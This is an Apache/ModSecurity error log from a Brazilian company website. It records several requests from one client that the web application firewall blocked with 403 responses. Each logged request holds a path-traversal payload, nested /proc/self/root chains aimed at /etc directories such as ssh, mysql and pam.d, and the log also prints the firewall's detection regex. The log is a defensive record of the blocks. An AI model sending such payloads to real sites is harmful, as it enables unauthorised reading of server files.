[Fri Mar 20 07:50:58.144515 2026] [:error] [pid 11642:tid 140411708356352] [client 74.7.243.128:56696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mkrninkcc-iUj5ApdyAAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:50:59.488848 2026] [:error] [pid 9818:tid 140411540502272] [client 74.7.243.128:57306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mk11pVZ5mVmJwsFMu1AAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:51:01.705335 2026] [:error] [pid 10189:tid 140411691570944] [client 74.7.243.128:57312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mlDJ3M9BSuKP7CAYZvgAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:51:11.707234 2026] [mime_magic:error] [pid 21219:tid 140411624429312] (70014)End of file found: [client 57.141.18.48:53238] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:51:16.020329 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.243.128:57320] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mpF1pVZ5mVmJwsFMu4AAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:51:17.293899 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.243.128:48176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mpfXLqtnMIWvjpaKZGQAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:51:55.101194 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.243.128:48188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0my7ninkcc-iUj5Apd_wAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:51:56.461490 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.243.128:36274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mzF1pVZ5mVmJwsFMu8gAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:52:12.977877 2026] [mime_magic:error] [pid 11167:tid 140411540502272] (70014)End of file found: [client 57.141.18.81:55384] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:52:22.407138 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:36278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0m5ta6ubjKNq_cu4bTXQAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:52:29.519014 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.243.128:41752] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0m7TJ3M9BSuKP7CAYZ-QAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:53:00.453780 2026] [mime_magic:error] [pid 9818:tid 140411674785536] (70014)End of file found: [client 57.141.18.34:56436] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:53:07.284218 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.243.128:45070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nEgF0L0L-SsrnPo5oKwAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:53:14.587107 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:37630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nGta6ubjKNq_cu4bTkQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:53:19.155386 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:59170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nH-oXxyEfFpUF8f-AiAAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:53:20.807381 2026] [:error] [pid 11642:tid 140411649607424] [client 74.7.243.128:47176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nILninkcc-iUj5ApeLwAAA4s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:53:31.383690 2026] [:error] [pid 7893:tid 140411683178240] [client 74.7.243.128:47190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nKxCii7xarUs8iHZm7wAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:53:41.074877 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.243.128:56382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nNfqxLDW4GITHUkTmKAAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:53:44.671140 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:36040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nONa6ubjKNq_cu4bTtwAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:53:46.522894 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.243.128:36046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nOhCii7xarUs8iHZnBQAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:05.003047 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:36054] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nTda6ubjKNq_cu4bT1wAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:06.640763 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:41890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nTvXLqtnMIWvjpaKaegAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:08.018410 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:41894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nUOoXxyEfFpUF8f-AkAAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:54:09.323030 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.243.128:41900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nUTJ3M9BSuKP7CAYaaQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
